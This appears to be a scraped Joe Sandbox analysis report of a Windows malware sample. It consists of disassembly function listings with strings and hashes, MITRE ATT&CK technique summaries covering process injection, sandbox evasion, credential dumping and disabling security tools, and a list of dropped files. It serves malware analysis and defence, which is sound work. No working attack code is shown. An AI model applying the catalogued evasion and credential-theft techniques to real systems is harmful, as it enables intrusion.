Instruction ID: 2f52f8d4ad210d96554b342af2c1ca1c7d0ab9aec2649946e9f2a1519c84f457
Opcode Fuzzy Hash: 5dfa38026fd4188667aa59a6bbf4829f1721ce34b33225beb86881193cceb585
Instruction Fuzzy Hash: 219152F04482948AC7158F54A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB95

Function 0347DE79 Relevance: 57.7, Strings: 46, Instructions: 190COMMON

Download Yara Rule

Strings

@@@@, xrefs: 0347DFF6
@@@@, xrefs: 0347DFE8
@@@@, xrefs: 0347E027
)*+,, xrefs: 0347DF6A
@@@@, xrefs: 0347E019
!"#$, xrefs: 0347DF5C
@@@?, xrefs: 0347DEF3
@@@@, xrefs: 0347DF8D
@@@@, xrefs: 0347E058
@@@@, xrefs: 0347E03C
@@@@, xrefs: 0347DFCC
@@@@, xrefs: 0347DF0F
@@@@, xrefs: 0347DF47
@@@@, xrefs: 0347DFB7
%&'(, xrefs: 0347DF63
@@@@, xrefs: 0347DFA2
@@@@, xrefs: 0347DFC5
@@@@, xrefs: 0347DFBE
@@@@, xrefs: 0347E004
@@@@, xrefs: 0347DF7F
@@@@, xrefs: 0347DF86
@@@@, xrefs: 0347DFA9
?, xrefs: 0347E070
@@@@, xrefs: 0347E051
@@@@, xrefs: 0347E035
@@@@, xrefs: 0347E05F
@@@@, xrefs: 0347DFFD
@@@@, xrefs: 0347E012
@@@@, xrefs: 0347E02E
@@@@, xrefs: 0347DFD3
@@@@, xrefs: 0347E020
4567, xrefs: 0347DEFA
@@@@, xrefs: 0347DFB0
123@, xrefs: 0347DF78
89:;, xrefs: 0347DF01
@@@@, xrefs: 0347DFDA
@@@@, xrefs: 0347DF9B
@@@@, xrefs: 0347E04A
@@@@, xrefs: 0347DFE1
<=@@, xrefs: 0347DF08
@@@@, xrefs: 0347DFEF
@@@@, xrefs: 0347E043
@@@@, xrefs: 0347E00B
-./0, xrefs: 0347DF71
@, xrefs: 0347DF16
@@@@, xrefs: 0347DF94

Memory Dump Source

Source File: 0000000A.00000002.4129781992.0000000003470000.00000040.00000800.00020000.00000000.sdmp, Offset: 03470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3470000_auditpol.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3754132690
Opcode ID: 76c7bf4ddbdf0433ee9e98079fc5a7cbc2c499b9213386ceb12db49061f7ec3e
Instruction ID: 6bbd1464ee24e6ced022537713ea0b02826eab90bdaeb77a3755e246b8b2ab2b
Opcode Fuzzy Hash: 76c7bf4ddbdf0433ee9e98079fc5a7cbc2c499b9213386ceb12db49061f7ec3e
Instruction Fuzzy Hash: 348195F04082988AC7158F54A0612AFFFB1EB86305F1581ADE7E6BF243C3BE8945CB44

Function 03692890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0369293C
___swprintf_l.LIBCMT ref: 0369295E
___swprintf_l.LIBCMT ref: 036929A3
___swprintf_l.LIBCMT ref: 036CA52E

Strings

ffff:, xrefs: 036CA504
:%u.%u.%u.%u, xrefs: 036CA5B8
::%hs%u.%u.%u.%u, xrefs: 036CA527
::ffff:0:%u.%u.%u.%u, xrefs: 036CA54E

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: a83396b0b302b129111edde82a6510aeb82850df9aa8870ddf2895941d9d642a
Instruction ID: a0f7f0184d1013cf690e9fe2424bf9f7b46beb3fdcfc8619361d3a949059851a
Opcode Fuzzy Hash: a83396b0b302b129111edde82a6510aeb82850df9aa8870ddf2895941d9d642a
Instruction Fuzzy Hash: 2951E5B5A0065ABEDF20DB98CA9097EF7BCBB08200754C56AE4A5D7741D234DE158BE0

Function 03687630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 036C46A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 036C4787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036C4742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036C4725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036C46FC
Execute=1, xrefs: 036C4713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036C4655

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 361cf20478f3389b9843a64a53b538745771fa2d598cd1212c1b849d55d286fc
Instruction ID: 17c772abf19996bf8b81ba568bf85e03a8655e31902bf8dcd7e9dc34588f01ca
Opcode Fuzzy Hash: 361cf20478f3389b9843a64a53b538745771fa2d598cd1212c1b849d55d286fc
Instruction Fuzzy Hash: F3513935A003086ADF11FFA5DC99FBE73A8EF0A300F1801ADD505AB280EB719A55CB64

Function 0369B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0369B6BF

Strings

+, xrefs: 0369B65A
0, xrefs: 0369B695
0, xrefs: 0369B66F
-, xrefs: 0369B650

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: b155f08e5ca5cbd0fe58c47bfca057a8799cb00c893cd8191bef717193ca07b6
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 2681D430E052499EFF24CE68EA957FEBBB9AF45320F1C425BD861AB390C7349851CB54

Function 0367F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036C02BD
RTL: Re-Waiting, xrefs: 036C031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036C02E7

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: ecee9e56c2f7fe8fd9bb233b379562436139045945ff52c1b36c47fc98e6e954
Instruction ID: 3990d3d568940d91503329ec2c0bf208d13a858ccc7e844da058488bff404bb0
Opcode Fuzzy Hash: ecee9e56c2f7fe8fd9bb233b379562436139045945ff52c1b36c47fc98e6e954
Instruction Fuzzy Hash: F4E1AB34618781DFD724CF28C984B6ABBE4FB88324F580A6DE4A58B3E1D774D945CB42

Function 0368BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 036C7BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036C7B7F
RTL: Resource at %p, xrefs: 036C7B8E

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: c76b1757233c3b472ffbec8bb6f459edb90ecc6fffa1f0c3765e86c2fbaf8164
Instruction ID: e4a43fc3b1eff835be5630fe5a8e2acc21cedbed11525fc91847dba3b7f3ad27
Opcode Fuzzy Hash: c76b1757233c3b472ffbec8bb6f459edb90ecc6fffa1f0c3765e86c2fbaf8164
Instruction Fuzzy Hash: 6641ED357047029FDB24EF29C940B6AB7E5EF89720F040A2DF95A9B380DB70E8058F95

Function 0368B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036C728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036C7294
RTL: Re-Waiting, xrefs: 036C72C1
RTL: Resource at %p, xrefs: 036C72A3

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: bc8c340df070fe432e0e7103a14795daba18eab701f78b0465b2b790ac04454d
Instruction ID: a28cb0dac140d3f711aca792065545b5bc7014e0afc24790d5c70c6455930b03
Opcode Fuzzy Hash: bc8c340df070fe432e0e7103a14795daba18eab701f78b0465b2b790ac04454d
Instruction Fuzzy Hash: 1A41F035700746AFD720DF25CD41B6ABBA5FF48720F18061DF855AB340DB24E8068BE9

Function 03473B19 Relevance: 6.3, Strings: 5, Instructions: 48COMMON

Download Yara Rule

Strings

ATIO, xrefs: 03473B55
ICAT, xrefs: 03473B78
PLIC, xrefs: 03473B4E
TEXT, xrefs: 03473B34
APPL, xrefs: 03473B71

Memory Dump Source

Source File: 0000000A.00000002.4129781992.0000000003470000.00000040.00000800.00020000.00000000.sdmp, Offset: 03470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3470000_auditpol.jbxd

Similarity

API ID:
String ID: APPL$ATIO$ICAT$PLIC$TEXT
API String ID: 0-3924305260
Opcode ID: df1de1e3b3aa030b92731e5659d3bf901e9d573d6d49091fb7f296725fd17c44
Instruction ID: cb3a7a77d0acf093fe7965f0f06b49ef83b4192654452b34c74847d044372bf6
Opcode Fuzzy Hash: df1de1e3b3aa030b92731e5659d3bf901e9d573d6d49091fb7f296725fd17c44
Instruction Fuzzy Hash: 45116AB090064C9FCF14EFA1D4881EDBBB0FF00304F51418EE429AB211DB354A86CF86

Function 03697D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03697E8B

Strings

+, xrefs: 03697DE8
-, xrefs: 03697DDD

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 75933d3966865fae10ad1fb47ede792620569117d8b3de4a9b7660b2cb11ff0d
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: A4919070E1021A9FFF24DE69C981ABEB7ADAF44720F18455BE865E73C0E7309941CB64

Function 03659126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 03659191
@, xrefs: 03659175

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: d96f56ae6d3a07245a029bab74e826a515651e8055ea382ebe504753c7abb0ab
Instruction ID: ff452fe6af698a7522808c829af07305504c44f933908fe7d580c8195caab113
Opcode Fuzzy Hash: d96f56ae6d3a07245a029bab74e826a515651e8055ea382ebe504753c7abb0ab
Instruction Fuzzy Hash: A1813BB5D00269DBDB31DB54CD54BEEBBB8AB08750F0445EAE919B7240E7309E81CFA4

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RN# D7521-RN-00353 REV-2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RN# D7521-RN-003_fe7c22bab8f2bb1b237e989214cbd58e6a8ae26d_5620e956_6b757824-e979-46a1-a72f-f10a4cd95fad\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF40C.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF7F5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF854.tmp.xml

C:\Users\user\AppData\Local\Temp\23X395L

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
RN# D7521-RN-00353 REV-2.exe

Function 00007FFD9B950068 Relevance: 3.6, Strings: 1, Instructions: 2372
COMMON

Function 00007FFD9B8833D0 Relevance: 2.0, Strings: 1, Instructions: 739
COMMON

Function 00007FFD9B8845F0 Relevance: 1.7, Strings: 1, Instructions: 454
COMMON

Function 00007FFD9B88BF11 Relevance: 1.5, Instructions: 1458
COMMON

Function 00007FFD9B8831B9 Relevance: 1.6, APIs: 1, Instructions: 121
memoryCOMMON

Function 00417883 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 0042C783 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON